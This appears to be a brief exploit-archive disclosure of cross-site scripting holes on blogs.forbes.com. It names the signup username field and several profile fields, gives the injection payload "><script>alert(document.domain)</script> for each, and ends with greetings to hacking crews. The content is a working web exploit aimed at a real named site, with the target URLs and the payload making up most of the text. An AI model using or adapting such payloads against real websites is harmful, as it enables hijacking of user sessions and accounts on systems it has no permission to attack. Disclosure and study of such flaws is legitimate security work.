TITLE:  FORBES Cross Site Scripting
   vendor: FORBES
  Author: r007k17-w
  Email:  n4gb07@gmail.com
  My blog: http://shadowrootkit.wordpress.com/

  Google Dork:2011 Forbes.com LLC™
   -------------------------------------------------------------------------------------------------------------------------------------------

  DEMO:

       1. http://blogs.forbes.com/wp-signup.php
        In 'username' field POSTDATA="><script>alert(document.domain)</script>

       2.http://blogs.forbes.com/wp-admin/user/profile.php
         After Signup in 'Profile settings'
         'First name', 'last name', 'Nickname' fields are vulnerable to XSS
         POSTDATA: "><script>alert(document.domain)</script>

---------------------------------------------------------------------------------------------------------------------------------------------

   gr33t1ngs to s1d3-3ff3cts,L0rd CrUs4d3r,3ps1lonl4mbd4,A1-w1n6( N17|<
),1nJ3ct0r t3am and all my friends
------------------------------------------------------------------------------------------------------------